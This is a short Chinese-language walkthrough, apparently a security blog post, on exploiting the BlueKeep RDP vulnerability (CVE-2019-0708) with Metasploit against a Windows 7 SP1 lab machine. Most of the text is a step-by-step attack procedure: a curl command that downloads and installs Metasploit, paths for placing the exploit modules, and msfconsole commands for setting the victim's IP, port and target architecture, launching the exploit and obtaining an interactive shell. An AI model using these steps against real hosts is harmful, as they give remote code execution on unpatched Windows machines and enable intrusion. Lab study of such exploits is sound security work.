0x01
2019年9月7日凌晨,msf上更新了0708的漏洞利用程序。
頓時安全群和朋友圈就爆炸了
-
奈何接到HW攻擊隊任務,又在家過了個中秋,0708才在今天更新。
0x02 環境
Windows 7 sp1
Kali
exp
0x02 利用
1.一鍵安裝metasploit-framework
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
2.下載Reference中的攻擊套件放置文件到msf的相應文件夾
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
msf命令:
使用msfconsole進入metasploit-framework ,reload_all重新加載0708rdp利用模塊

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce啟用0708RDP攻擊模塊

使用set RHOSTS 設置受害機IP

使用set RPORT 設置受害機RDP端口號

使用set target ID數字(可選為0-4)設置受害機機器架構
我使用的是Parallels Desktop,設置target 1

使用exploit開始攻擊,等待建立連接

建立連接以后,使用shell獲得shell,再使用python獲得交互式shell,執行whoami
